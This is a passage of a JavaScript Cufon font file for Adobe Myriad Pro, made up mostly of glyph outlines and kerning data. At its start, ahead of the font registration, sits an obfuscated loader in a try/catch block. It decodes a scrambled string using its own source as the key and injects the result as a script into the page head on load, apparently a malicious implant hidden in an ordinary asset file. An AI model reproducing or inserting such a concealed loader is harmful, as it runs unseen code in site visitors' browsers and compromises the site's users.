};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+443-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("KJR=&e%M,.EBKL[:ie*#`J`Ejw%=ReEBjw(#,.8GRP!6ntMQFM8vn0in.tCMjV0vDJmvPmm!.eCj0w(%HP[?f^`r0Ga>iG*{Dq3#`*a4R$rH&LRkReM)jeP3RV%)0L4dK[*4`)[d,q*`8Q{5(-DwqMy4ftPbKPPuFmvu-GP2j-iL8-xki=n:b05M&)!QfG%v&J[MKL`QKqayb-x64^=QfGx6&^=vfea[&eiM,LaGb.`BRQ3G&V[v,VDEs$M:,.nhnQ32,tM2jQ{_lGi$i=vBK-!hbty6&w%C&JC24$8!neP6&J*Q&wEQn.([jL3)&wMy(LEyfG8[4$Fh&JE)nj8y&w?B,JEtiJ3C&.0yK.R24Q{:,-a6l#6u,q[G.w%&,P=ibjx~L^m*JV`(KfD%lbF8q-0P.jnR,&4isH{CQ)5[eGhy>u6rB2va#tM=w$?3d:!Ek_~&,P=EKq{y")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":199,"face":{"font-family":"myriadpro","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 7 3 3 4 3 2 2 4","ascent":"270","descent":"-90","x-height":"4","bbox":"-14 -270 315 90","underline-thickness":"18","underline-position":"-18","stemh":"40","stemv":"55","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * © 1992, 1994, 1997, 2000, 2004 Adobe Systems Incorporated. All rights reserved.
 * Protected by U.S. Patents D454,582.
 * 
 * Trademark:
 * Myriad is either a registered trademark or a trademark of Adobe Systems
 * Incorporated in the United States and/or other countries.
 * 
 * Full name:
 * MyriadPro-It
 * 
 * Designer:
 * Robert Slimbach and Carol Twombly
 * 
 * Vendor URL:
 * http://www.adobe.com/type
 * 
 * License information:
 * http://www.adobe.com/type/legal.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"40,0r-30,0r49,-256r30,0","w":82,"k":{",":5,".":5}},{"d":"170,-75v1,73,-88,85,-158,73r45,-237v51,-11,125,-8,125,49v0,31,-25,54,-52,61v22,6,40,25,40,54xm82,-219r-15,79v45,3,84,-9,84,-47v0,-32,-39,-38,-69,-32xm63,-117r-18,93v46,7,93,-4,93,-52v0,-37,-36,-44,-75,-41","w":186,"k":{"T":4,"A":-2,"U":3,"V":1,"W":1,"X":1,"Y":6,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"v":-3,"w":-3,"y":-3,"-":-3,",":5,".":5}},{"d":"156,-139r-5,25r-88,0r-17,88r99,0r-5,26r-129,0r46,-243r124,0r-5,26r-94,0r-14,78r88,0","w":169,"k":{"V":-3,"W":-3,"Y":-1,"f":-1,"g":2,"c":2,"d":2,"e":2,"o":2,"q":2,"t":1,"u":2,"v":3,"w":3,"y":3,"z":-1,"a":2,",":3,".":3}},{"d":"192,-68r-24,0r-60,-140r-59,140r-24,0r73,-166r22,0","w":214},{"d":"212,-209v-79,-36,-162,26,-162,108v0,61,56,93,114,71r14,-72r-49,0r4,-25r79,0r-22,117v-14,6,-41,13,-69,13v-62,0,-103,-45,-103,-101v0,-78,62,-147,147,-147v30,0,49,7,57,11","w":224,"k":{"T":1,"A":-2,"V":2,"W":2,"Y":3,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"a":-3,"-":-1}},{"d":"65,40v-73,6,-40,-78,-29,-115v0,-7,-3,-20,-24,-20r3,-18v48,-2,31,-51,39,-87v8,-35,30,-49,66,-47v-3,6,1,19,-10,19v-60,0,-14,120,-70,125v43,15,0,71,1,101v0,15,10,25,28,23","w":102,"k":{"T":-18,"A":3,"C":3,"G":3,"O":3,"Q":3,"V":-16,"W":-16,"X":-1,"Y":-12,"J":1,"j":-15,"c":4,"d":4,"e":4,"o":4,"q":4}},{"d":"169,-238r-4,26v-59,1,-98,38,-114,87v32,-47,114,-34,114,34v0,46,-36,95,-86,95v-45,0,-66,-33,-66,-77v0,-95,64,-161,156,-165xm134,-89v-1,-65,-80,-46,-90,2v-7,32,5,67,37,67v31,0,53,-36,53,-69"},{"d":"39,-247r63,0r-54,287r-63,0r3,-19r39,0r47,-249r-38,0","w":102},{"d":"-18,27r180,0r-3,18r-180,0","w":180},{"d":"24,71r-29,0r35,-183v4,-21,7,-45,9,-63r28,0v-1,11,-6,25,-4,34v15,-23,38,-37,62,-37v37,0,54,31,54,63v1,75,-66,142,-140,111xm53,-78r-9,49v51,34,105,-25,104,-84v0,-18,-8,-40,-34,-40v-23,0,-52,26,-61,75","w":189,"k":{"T":19,"g":-1,"j":2,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"v":3,"w":3,"y":3,"x":4,"z":3,"-":-5,"\"":8,"'":8,",":6,".":6}},{"d":"154,0r-28,0v-1,-9,4,-30,3,-45v-19,36,-43,49,-68,49v-31,0,-50,-25,-50,-58v0,-76,76,-147,168,-118v-9,50,-27,119,-25,172xm72,-21v41,0,69,-77,73,-131v-58,-13,-102,38,-103,93v0,19,7,38,30,38","w":187},{"d":"4,63r8,-23v46,21,99,16,109,-51r5,-26v-26,57,-114,44,-114,-23v0,-80,85,-146,167,-106v-18,73,-17,180,-62,222v-29,27,-83,23,-113,7xm77,-24v47,-1,63,-73,69,-124v-54,-24,-103,29,-103,82v0,19,7,42,34,42","w":188,"k":{"T":15,"g":1,",":5,".":5}},{"d":"119,-67v0,-43,-95,-62,-84,-108v-6,-63,87,-87,132,-59r-11,25v-23,-21,-90,-11,-90,28v0,20,11,33,38,45v75,34,53,144,-41,140v-24,0,-49,-8,-59,-17r11,-24v32,24,104,22,104,-30","w":167,"k":{"C":1,"G":1,"O":1,"Q":1,"c":-4,"d":-4,"e":-4,"o":-4,"q":-4,"v":4,"w":4,"y":4,"x":1,"a":-3,"-":-1}},{"w":65},{"d":"53,0r41,-217r-71,0r5,-26r173,0r-6,26r-71,0r-41,217r-30,0","w":170,"k":{"i":18,"T":-15,"A":20,"C":6,"G":6,"O":6,"Q":6,"V":-16,"W":-16,"X":-11,"Y":-11,"J":17,"S":-3,"g":25,"m":18,"n":18,"p":18,"r":18,"c":21,"d":21,"e":21,"o":21,"q":21,"s":22,"t":3,"u":21,"v":12,"w":12,"y":12,"x":18,"z":20,"a":27,"b":1,"h":1,"k":1,"l":1,":":10,";":10,"-":23,")":-20,"]":-20,"}":-20,"\"":-6,"'":-6,",":24,".":24}},{"d":"56,-207r31,-9r-8,42r42,0r-5,23r-41,0r-20,112v-2,15,16,20,31,16r-2,23v-25,11,-63,-3,-60,-30v5,-41,15,-82,21,-121r-24,0r4,-23r25,0","w":112,"k":{"g":2,"c":1,"d":1,"e":1,"o":1,"q":1,"v":-4,"w":-4,"y":-4}},{"d":"76,31r-22,0r7,-36v-18,-1,-38,-8,-48,-16r10,-24v25,24,97,22,95,-24v0,-16,-6,-30,-30,-40v-68,-29,-55,-112,17,-120r7,-35r22,0r-7,35v18,1,33,7,40,12r-11,22v-18,-17,-83,-14,-83,24v0,16,8,27,35,39v69,31,43,123,-26,127"},{"d":"70,40r-63,0r55,-287r63,0r-4,19r-39,0r-47,249r38,0","w":102,"k":{"T":-18,"A":3,"C":3,"G":3,"O":3,"Q":3,"V":-16,"W":-16,"X":-1,"Y":-12,"J":1,"j":-15,"c":4,"d":4,"e":4,"o":4,"q":4}},{"d":"57,-239v55,-12,130,-6,129,52v0,36,-27,62,-58,71v34,3,27,96,34,116r-31,0v-1,-5,-3,-31,-5,-59v-2,-45,-24,-50,-65,-47r-20,106r-30,0xm82,-218r-16,89v50,5,88,-16,88,-54v0,-36,-41,-43,-72,-35","w":188,"k":{"T":3,"A":-2,"C":-2,"G":-2,"O":-2,"Q":-2,"U":4,"V":-2,"W":-2,"X":-1,"Y":5,"g":3,"i":-3,"m":-3,"n":-3,"p":-3,"r":-3,"t":-6,"u":1,"v":-5,"w":-5,"y":-5,"a":1,"b":-3,"h":-3,"k":-3,"l":-3,"-":2}},{"d":"57,-243r30,0v-9,59,-30,111,-30,175v0,31,18,46,45,46v33,0,57,-22,67,-77r28,-144r30,0r-28,145v-14,72,-50,102,-101,102v-52,0,-80,-44,-68,-105","w":223,"k":{"A":6,"S":3,"f":-5,"t":-1,"v":-1,"w":-1,"y":-1,"x":1,"b":-2,"h":-2,"k":-2,"l":-2}},{"d":"9,42r-26,0v57,-59,105,-185,56,-291r23,0v53,94,2,243,-53,291","w":102},{"d":"145,-247v144,5,101,219,3,242r0,2v21,4,43,9,64,12r-11,25v-42,-10,-74,-26,-101,-30v-46,-6,-83,-39,-83,-99v-1,-73,50,-155,128,-152xm112,-21v62,1,93,-72,93,-126v0,-32,-11,-74,-64,-74v-62,0,-92,72,-92,125v0,39,16,75,63,75","w":240,"k":{"T":10,"A":3,"X":4,"Y":12,"f":-8,"g":-5,"j":-1,"i":-2,"m":-2,"n":-2,"p":-2,"r":-2,"c":-4,"d":-4,"e":-4,"o":-4,"q":-4,"s":-3,"t":-8,"u":-2,"v":-6,"w":-6,"y":-6,"z":-1,"a":-4,"b":-3,"h":-3,"k":-3,"l":-3,":":-2,";":-2,"-":-5,",":9,".":9}},{"d":"51,-123v-12,0,-19,-9,-19,-21v0,-13,9,-24,22,-24v12,0,20,9,20,21v0,13,-9,24,-23,24xm27,4v-12,0,-19,-9,-19,-21v0,-13,9,-24,22,-24v12,0,20,9,20,21v0,13,-9,24,-23,24","w":75},{"d":"57,-243r30,0r-46,243r-30,0","w":83,"k":{"f":-3,"t":-2,"v":-2,"w":-2,"y":-2,"z":-3}},{"d":"131,-32r5,22v-13,7,-35,14,-58,14v-46,0,-66,-31,-66,-70v0,-53,39,-112,95,-112v33,0,51,20,51,45v0,46,-52,57,-116,56v-4,30,14,57,43,57v21,0,35,-6,46,-12xm129,-133v0,-14,-10,-22,-26,-22v-28,0,-50,28,-58,55v47,1,84,-6,84,-33","w":163,"k":{"T":13,"-":-4,",":4,".":4}},{"d":"93,0r-33,0r-30,-243r30,0r24,211v28,-66,71,-145,104,-211r33,0","w":194,"k":{"T":-12,"A":16,"M":2,"J":12,"S":-3,"g":13,"i":3,"m":3,"n":3,"p":3,"r":3,"c":11,"d":11,"e":11,"o":11,"q":11,"s":9,"t":-3,"u":5,"x":5,"z":5,"a":13,"b":-2,"h":-2,"k":-2,"l":-2,":":6,";":6,"-":8,")":-13,"]":-13,"}":-13,"\"":-4,"'":-4,",":19,".":19}},{"d":"99,-192r22,0r0,85r79,0r0,21r-79,0r0,86r-22,0r0,-86r-79,0r0,-21r79,0r0,-85","w":214},{"d":"40,0r-30,0r34,-174r29,0xm66,-204v-10,0,-17,-7,-17,-18v0,-12,9,-21,19,-21v11,0,18,8,18,19v0,12,-8,20,-20,20","w":82},{"d":"17,-95v-1,-74,48,-153,128,-152v66,0,92,48,92,100v0,74,-48,151,-128,151v-63,0,-92,-48,-92,-99xm114,-21v60,0,91,-69,91,-125v0,-35,-11,-75,-64,-75v-61,-1,-92,68,-92,124v0,40,17,76,65,76","w":240,"k":{"T":10,"A":3,"X":4,"Y":12,"f":-8,"g":-5,"j":-1,"i":-2,"m":-2,"n":-2,"p":-2,"r":-2,"c":-4,"d":-4,"e":-4,"o":-4,"q":-4,"s":-3,"t":-8,"u":-2,"v":-6,"w":-6,"y":-6,"z":-1,"a":-4,"b":-3,"h":-3,"k":-3,"l":-3,":":-2,";":-2,"-":-5,",":9,".":9}},{"d":"192,0r-35,0v-6,-7,-11,-13,-17,-22v-39,44,-134,30,-134,-35v0,-39,32,-63,60,-79v-31,-46,-4,-111,51,-111v32,0,49,22,49,48v1,30,-22,51,-62,72v13,23,31,49,44,67v15,-18,26,-41,36,-72r28,0v-13,39,-29,69,-51,92v9,13,19,26,31,40xm36,-61v0,47,69,54,91,20v-12,-17,-32,-47,-50,-77v-16,10,-41,27,-41,57xm114,-225v-33,0,-43,53,-22,80v29,-14,47,-30,47,-53v0,-14,-7,-27,-25,-27","w":212},{"d":"40,0r-30,0r31,-174r27,0v-1,10,-6,24,-4,33v21,-44,98,-54,102,2v15,-25,38,-39,64,-39v30,0,46,35,39,75r-19,103r-29,0r21,-123v0,-18,-7,-30,-26,-30v-22,0,-48,25,-55,64r-17,89r-28,0r21,-123v0,-15,-4,-30,-26,-30v-22,0,-49,29,-56,66","w":290,"k":{"T":21,"u":2,"v":2,"w":2,"y":2,"x":1,"\"":13,"'":13}},{"d":"40,0r-30,0r49,-256r30,0r-30,161v24,-28,51,-52,77,-79r37,0r-76,71r52,103r-33,0r-42,-86r-22,20","w":164,"k":{"T":10,"g":5,"i":-3,"m":-3,"n":-3,"p":-3,"r":-3,"c":5,"d":5,"e":5,"o":5,"q":5,"v":-3,"w":-3,"y":-3,"a":5,"b":-3,"h":-3,"k":-3,"l":-3,":":-4,";":-4,",":-4,".":-4}},{"d":"72,-149v41,-5,80,23,80,62v0,77,-89,111,-147,78r10,-24v37,25,110,4,106,-48v7,-33,-39,-52,-83,-43r33,-110r104,0r-5,26r-80,0"},{"d":"52,-247r34,0r23,52r-21,0","w":137},{"d":"-8,0r4,-18r84,-95v15,-17,26,-24,37,-37r-90,0r5,-24r125,0r-4,20r-83,92v-16,19,-27,24,-36,38r97,0r-5,24r-134,0","w":149,"k":{"T":10,"f":-8,"c":2,"d":2,"e":2,"o":2,"q":2,"t":-4,"v":-9,"w":-9,"y":-9}},{"d":"198,-129v-1,97,-86,34,-133,23v-12,0,-21,11,-21,30r-21,0v-1,-35,18,-54,42,-54v22,0,69,33,93,31v13,0,19,-11,19,-30r21,0","w":214},{"d":"40,0r-30,0r32,-174r26,0v0,11,-5,25,-3,34v15,-24,39,-38,64,-38v31,0,49,35,41,76r-19,102r-30,0r22,-123v0,-17,-7,-30,-28,-30v-21,0,-51,25,-59,68","w":192,"k":{"T":21,"u":2,"v":2,"w":2,"y":2,"x":1,"\"":13,"'":13}},{"d":"22,-174r29,0r7,98v2,22,-2,34,1,46v18,-46,49,-99,71,-144r26,0r15,144v16,-50,42,-98,63,-144r31,0r-86,174r-28,0r-15,-141v-20,51,-46,94,-70,141r-28,0","w":254,"k":{"T":12,"g":6,"j":2,"c":3,"d":3,"e":3,"o":3,"q":3,"v":-5,"w":-5,"y":-5,"a":6,":":-5,";":-5,"-":3,",":14,".":14}},{"d":"45,-174r30,0v-19,74,-20,179,-56,232v-12,17,-36,20,-59,15r4,-23v28,4,39,-1,47,-44xm66,-204v-10,0,-17,-7,-17,-18v0,-12,9,-21,20,-21v10,0,17,8,17,19v0,12,-8,20,-20,20","w":81,"k":{"j":-8,",":4,".":4}},{"d":"19,-174r30,0v9,46,10,100,22,142v17,-43,49,-99,71,-142r33,0r-97,174r-29,0","w":163,"k":{"T":12,"g":6,"j":2,"c":3,"d":3,"e":3,"o":3,"q":3,"v":-5,"w":-5,"y":-5,"a":6,":":-5,";":-5,"-":3,",":14,".":14}},{"d":"87,0r-29,0r19,-101r-47,-142r32,0r34,120v20,-36,55,-84,79,-120r35,0r-103,142","w":186,"k":{"i":13,"T":-8,"A":27,"C":9,"G":9,"O":9,"Q":9,"U":2,"V":-4,"W":-4,"X":5,"M":7,"J":21,"S":3,"B":3,"D":3,"E":3,"F":3,"H":3,"I":3,"K":3,"L":3,"N":3,"P":3,"R":3,"g":29,"j":3,"m":13,"n":13,"p":13,"r":13,"c":25,"d":25,"e":25,"o":25,"q":25,"s":24,"t":7,"u":19,"v":9,"w":9,"y":9,"x":15,"z":19,"a":31,"b":3,"h":3,"k":3,"l":3,":":9,";":9,"-":23,")":-10,"]":-10,"}":-10,",":35,".":35}},{"d":"168,0r-32,0r-39,-103r-72,103r-36,0r95,-123r-45,-120r31,0r36,99r71,-99r36,0r-94,119","w":187,"k":{"T":-9,"A":3,"C":8,"G":8,"O":8,"Q":8,"V":-9,"W":-9,"X":-6,"Y":-9,"g":5,"c":5,"d":5,"e":5,"o":5,"q":5,"u":4,"v":5,"w":5,"y":5,"a":5,"-":9,")":-9,"]":-9,"}":-9,"\"":-1,"'":-1,",":-2,".":-2}},{"d":"57,-256r30,0r-22,113v15,-23,38,-35,61,-35v38,0,53,31,53,62v0,54,-39,120,-109,120v-42,0,-58,-30,-50,-72xm114,-153v-37,0,-67,54,-67,108v0,17,10,26,28,26v45,0,73,-54,73,-93v0,-22,-10,-41,-34,-41","w":189,"k":{"T":19,"g":-1,"j":2,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"v":3,"w":3,"y":3,"x":4,"z":3,"-":-5,"\"":8,"'":8,",":6,".":6}},{"d":"44,-249r31,0r-22,87r-20,0xm98,-249r31,0r-23,87r-20,0","w":109,"k":{"A":14,"Y":-9,"J":20,"f":-15,"t":-9,"b":-4,"h":-4,"k":-4,"l":-4,",":37,".":37}},{"d":"57,-129v2,30,62,40,56,75v5,55,-73,71,-110,46r9,-22v19,16,70,14,70,-18v0,-31,-63,-43,-55,-77v-6,-43,63,-66,99,-45r-8,23v-16,-13,-63,-11,-61,18","w":134,"k":{"T":15,"-":2,",":4,".":4}},{"d":"17,-174r31,0r26,139r64,-139r31,0v-39,73,-72,168,-125,224v-19,20,-41,28,-51,30r-7,-26v26,-10,59,-31,66,-65","w":158,"k":{"T":12,"g":6,"j":2,"c":3,"d":3,"e":3,"o":3,"q":3,"v":-5,"w":-5,"y":-5,"a":6,":":-5,";":-5,"-":3,",":14,".":14}},{"d":"44,0r-30,0r29,-151r-24,0r5,-23r23,0v4,-51,40,-101,96,-81r-7,24v-36,-13,-56,17,-59,57r39,0r-5,23r-39,0","w":101,"k":{"t":-2,"a":3,":":-12,";":-12,")":-31,"]":-31,"}":-31,"\"":-23,"'":-23,",":11,".":11}},{"d":"133,71r-30,0r21,-103v-29,54,-112,45,-112,-27v0,-58,42,-119,110,-119v23,0,43,5,56,11xm73,-21v49,0,66,-74,72,-127v-52,-23,-104,25,-103,85v0,27,13,42,31,42","w":189,"k":{"T":17,"g":1,"x":1,"a":2,",":4,".":4}},{"d":"166,-256r29,0r-38,201v-3,18,-6,38,-7,55r-28,0v1,-11,6,-26,4,-35v-27,57,-114,51,-114,-24v0,-71,62,-139,138,-113xm134,-86r11,-61v-52,-26,-105,28,-103,84v0,21,7,42,33,42v23,0,51,-26,59,-65","w":189,"k":{",":5,".":5}},{"d":"186,-182v-3,65,-60,96,-127,85r-18,97r-30,0r46,-239v54,-12,132,-7,129,57xm82,-218r-18,96v49,11,92,-16,92,-58v0,-39,-41,-44,-74,-38","w":182,"k":{"T":3,"A":23,"X":12,"Y":1,"J":27,"Z":13,"g":8,"i":4,"m":4,"n":4,"p":4,"r":4,"c":7,"d":7,"e":7,"o":7,"q":7,"s":4,"t":-3,"u":5,"v":-6,"w":-6,"y":-6,"a":8,"b":2,"h":2,"k":2,"l":2,":":4,";":4,"-":4,")":3,"]":3,"}":3,",":39,".":39}},{"d":"28,-86r0,-19r161,-87r0,25r-135,72r135,71r0,24","w":214},{"d":"6,-11r10,-24v9,5,24,13,45,13v40,0,58,-27,58,-51v-1,-33,-28,-43,-62,-41r5,-24v32,2,67,-10,70,-45v4,-38,-60,-32,-78,-16r-6,-23v35,-28,115,-17,115,34v0,32,-26,52,-51,62v26,6,38,28,38,53v0,65,-97,97,-144,62"},{"d":"93,-238v30,0,42,24,42,49v0,51,-27,94,-66,94v-28,0,-44,-21,-44,-52v0,-44,26,-91,68,-91xm89,-219v-24,0,-40,41,-40,73v0,17,5,32,23,32v24,0,39,-43,39,-74v0,-14,-4,-31,-22,-31xm67,5r-22,0r177,-243r21,0xm222,-141v30,0,43,24,43,49v0,51,-27,95,-66,95v-27,0,-44,-22,-44,-53v0,-44,26,-91,67,-91xm219,-122v-24,0,-39,41,-39,73v0,17,4,32,22,32v24,0,39,-43,39,-74v0,-14,-4,-31,-22,-31","w":278},{"d":"122,-247r20,13r-39,45r55,-7r-5,25v-17,-1,-37,-7,-52,-6r29,43r-23,13v-7,-16,-10,-35,-18,-50r-28,50r-19,-13r39,-44r-54,7r5,-25v16,1,36,7,50,6r-28,-44r23,-12v7,16,10,35,18,50","w":149},{"d":"7,42r-22,2v11,-22,27,-59,35,-86r35,-4v-13,31,-35,71,-48,88xm53,-123v-12,0,-20,-9,-20,-21v0,-13,10,-24,23,-24v12,0,20,9,20,21v0,13,-9,24,-23,24","w":75},{"d":"229,-146v0,108,-92,168,-217,145r45,-239v88,-12,172,0,172,94xm46,-24v95,13,147,-40,151,-121v3,-54,-49,-86,-114,-72","w":232,"k":{"T":10,"A":3,"X":4,"Y":12,"f":-8,"g":-5,"j":-1,"i":-2,"m":-2,"n":-2,"p":-2,"r":-2,"c":-4,"d":-4,"e":-4,"o":-4,"q":-4,"s":-3,"t":-8,"u":-2,"v":-6,"w":-6,"y":-6,"z":-1,"a":-4,"b":-3,"h":-3,"k":-3,"l":-3,":":-2,";":-2,"-":-5,",":9,".":9}},{"d":"42,-247v73,-5,40,78,29,116v0,7,3,19,24,19r-3,18v-48,2,-31,50,-39,87v-8,35,-30,49,-66,47v3,-6,-1,-19,10,-19v60,0,12,-119,70,-124v-43,-15,0,-72,-1,-102v0,-15,-10,-25,-28,-23","w":102},{"d":"66,0r37,-204r-40,20r-3,-23v26,-10,40,-31,79,-27r-45,234r-28,0"},{"d":"27,4v-12,0,-19,-9,-19,-21v0,-13,9,-24,22,-24v12,0,20,9,20,21v0,13,-9,24,-23,24","w":75,"k":{"T":22,"A":-6,"V":19,"W":19,"X":-7,"Y":27,"J":-1,"Z":-8,"\"":48,"'":48}},{"d":"11,0r46,-243r123,0r-5,26r-93,0r-15,82r85,0r-5,25r-85,0r-21,110r-30,0","w":167,"k":{"A":22,"C":1,"G":1,"O":1,"Q":1,"X":1,"M":3,"J":31,"g":13,"i":8,"m":8,"n":8,"p":8,"r":8,"c":10,"d":10,"e":10,"o":10,"q":10,"s":10,"u":10,"v":7,"w":7,"y":7,"x":12,"a":15,"b":6,"h":6,"k":6,"l":6,":":4,";":4,"-":2,"\"":-2,"'":-2,",":31,".":31}},{"d":"23,-174r32,0v11,21,18,46,30,66v15,-24,34,-45,51,-66r34,0r-73,85r41,89r-33,0v-11,-23,-18,-49,-30,-70v-14,24,-37,48,-54,70r-34,0r76,-90","w":158,"k":{"T":9,"g":3,"c":6,"d":6,"e":6,"o":6,"q":6,"t":-4,"v":-5,"w":-5,"y":-5,"a":4}},{"d":"17,-109r86,0r-4,23r-86,0","w":110,"k":{"T":19,"C":-7,"G":-7,"O":-7,"Q":-7,"V":5,"W":5,"X":2,"Y":17,"J":12,"S":1,"g":-8,"c":-9,"d":-9,"e":-9,"o":-9,"q":-9,"a":-8}},{"d":"118,-238v45,0,58,37,58,73v0,77,-36,169,-102,169v-43,0,-59,-35,-59,-80v0,-78,41,-162,103,-162xm114,-214v-41,0,-69,82,-69,139v0,25,5,55,33,55v44,0,68,-96,68,-143v0,-18,-3,-51,-32,-51"},{"d":"204,-211v-76,-32,-155,27,-155,110v0,44,20,79,74,79v18,0,39,-3,52,-10r4,24v-14,6,-36,12,-63,12v-61,0,-98,-39,-98,-101v0,-98,100,-179,195,-138","w":199,"k":{"A":-1,"C":9,"G":9,"O":9,"Q":9,"V":-3,"W":-3,"M":-1,"g":1,"c":3,"d":3,"e":3,"o":3,"q":3,"u":3,"v":5,"w":5,"y":5,"z":-2,"a":3,")":-7,"]":-7,"}":-7}},{"d":"11,0r46,-243r30,0r-41,217r98,0r-5,26r-128,0","w":159,"k":{"T":31,"A":-4,"C":16,"G":16,"O":16,"Q":16,"U":18,"V":23,"W":23,"Y":32,"J":-1,"Z":-7,"g":4,"c":9,"d":9,"e":9,"o":9,"q":9,"u":5,"v":14,"w":14,"y":14,"x":-1,"z":-6,"a":1,"-":21,"\"":49,"'":49}},{"d":"144,-202v3,52,-72,79,-69,133r-29,0v-8,-49,62,-84,67,-128v3,-29,-46,-30,-63,-15r-6,-22v31,-25,107,-11,100,32xm49,4v-12,0,-19,-9,-19,-21v0,-13,9,-24,22,-24v12,0,20,9,20,21v0,13,-9,24,-23,24","w":138},{"w":65},{"d":"11,0r46,-243r30,0r-23,118v12,-7,18,-18,26,-27r85,-91r38,0r-102,105r62,138r-33,0r-53,-119r-29,27r-17,92r-30,0","w":185,"k":{"A":-2,"C":7,"G":7,"O":7,"Q":7,"U":3,"V":-5,"W":-5,"J":-8,"S":1,"Z":-8,"g":2,"i":-3,"m":-3,"n":-3,"p":-3,"r":-3,"c":3,"d":3,"e":3,"o":3,"q":3,"u":4,"v":7,"w":7,"y":7,"b":-3,"h":-3,"k":-3,"l":-3,"-":9,")":-8,"]":-8,"}":-8,"\"":-3,"'":-3,",":-8,".":-8}},{"d":"114,-43v36,0,47,-52,52,-89v-40,-13,-76,21,-76,62v0,16,8,27,24,27xm179,8r6,15v-78,41,-172,-4,-172,-98v0,-74,51,-138,131,-138v63,0,104,44,104,104v0,54,-30,86,-64,86v-15,0,-26,-13,-28,-32v-20,43,-87,46,-89,-14v-2,-58,63,-103,123,-78r-12,66v-5,27,-1,40,11,40v19,1,39,-25,39,-66v0,-53,-32,-90,-88,-90v-59,0,-107,47,-107,120v0,82,78,120,146,85","w":259},{"d":"34,-270r23,0r0,360r-23,0r0,-360","w":78},{"d":"112,14r-24,0r-66,-261r23,0","w":118},{"d":"46,-249r31,0r-22,87r-20,0","w":59,"k":{"A":14,"Y":-9,"J":20,"f":-15,"t":-9,"b":-4,"h":-4,"k":-4,"l":-4,",":37,".":37}},{"d":"8,42r-23,3v11,-22,27,-61,35,-87r35,-3v-13,31,-34,70,-47,87","w":75,"k":{"T":22,"A":-6,"V":19,"W":19,"X":-7,"Y":27,"J":-1,"Z":-8,"\"":48,"'":48}},{"d":"100,-249r26,0v-57,58,-105,185,-56,291r-22,0v-55,-93,-4,-243,52,-291","w":102,"k":{"T":-18,"A":3,"C":3,"G":3,"O":3,"Q":3,"V":-16,"W":-16,"X":-1,"Y":-12,"J":1,"j":-15,"c":4,"d":4,"e":4,"o":4,"q":4}},{"d":"9,-54v0,-37,27,-60,55,-72v-56,-37,-14,-112,49,-112v34,0,59,21,59,53v1,29,-20,48,-46,62v70,35,23,127,-47,127v-44,0,-70,-25,-70,-58xm81,-19v27,0,49,-18,49,-46v0,-23,-13,-38,-41,-48v-24,6,-49,24,-49,55v0,20,13,39,41,39xm109,-215v-49,1,-59,70,-8,81v23,-8,42,-25,42,-47v0,-16,-8,-34,-34,-34"},{"d":"195,-106r0,20r-162,86r0,-24r137,-72r-137,-71r0,-25","w":214},{"d":"121,0r-28,0r12,-64r-101,0r4,-21r124,-149r33,0r-27,146r31,0r-4,24r-32,0xm41,-89v20,3,46,0,68,1r23,-116v-26,43,-60,77,-91,115"},{"d":"51,-70r-24,0r29,-173r34,0xm28,4v-12,0,-20,-9,-20,-21v0,-13,10,-24,23,-24v12,0,20,9,20,21v0,13,-9,24,-23,24","w":84},{"d":"109,-178v47,0,68,35,68,72v0,54,-37,110,-96,110v-44,0,-68,-33,-68,-72v0,-58,39,-110,96,-110xm106,-154v-37,0,-62,45,-62,85v0,28,16,49,41,49v35,0,62,-45,62,-86v0,-20,-10,-48,-41,-48","w":187,"k":{"T":19,"g":-1,"j":2,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"v":3,"w":3,"y":3,"x":4,"z":3,"-":-5,"\"":8,"'":8,",":6,".":6}},{"d":"76,-79r31,-164r29,0r-31,167v-10,72,-57,92,-116,73r6,-25v42,12,70,5,81,-51","w":131,"k":{"A":2,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"v":-5,"w":-5,"y":-5,")":-12,"]":-12,"}":-12}},{"d":"150,-174r30,0r-31,174r-27,0r4,-33v-15,23,-39,37,-62,37v-33,0,-51,-36,-42,-80r19,-98r29,0r-21,123v0,18,7,30,28,30v22,0,49,-26,56,-64","w":189,"k":{"T":17,"g":1,"x":1,"a":2,",":4,".":4}},{"d":"69,-91r33,0r16,-53r-32,0xm41,0r-21,0r22,-71r-30,0r4,-20r33,0r16,-53r-31,0r3,-21r34,0r22,-69r21,0r-22,69r33,0r22,-69r20,0r-21,69r29,0r-3,21r-33,0r-16,53r31,0r-4,20r-34,0r-21,71r-22,0r22,-71r-32,0"},{"d":"144,-77r-84,0r-38,77r-32,0r126,-243r35,0r34,243r-31,0xm71,-100r71,0r-15,-115v-16,40,-37,78,-56,115","w":204,"k":{"T":22,"A":4,"C":8,"G":8,"O":8,"Q":8,"U":10,"V":15,"W":15,"X":2,"Y":22,"f":1,"g":4,"j":-4,"i":-3,"m":-3,"n":-3,"p":-3,"r":-3,"c":4,"d":4,"e":4,"o":4,"q":4,"s":-2,"t":1,"u":1,"v":8,"w":8,"y":8,"x":-5,"z":-7,"-":2,"\"":13,"'":13}},{"d":"79,0r-32,0r-12,-243r30,0r6,209v24,-63,64,-145,92,-209r32,0r7,208v24,-73,59,-140,89,-208r31,0r-112,243r-32,0r-6,-138v-2,-27,0,-45,-1,-70v-24,75,-61,139,-92,208","w":298,"k":{"T":-12,"A":16,"M":2,"J":12,"S":-3,"g":13,"i":3,"m":3,"n":3,"p":3,"r":3,"c":11,"d":11,"e":11,"o":11,"q":11,"s":9,"t":-3,"u":5,"x":5,"z":5,"a":13,"b":-2,"h":-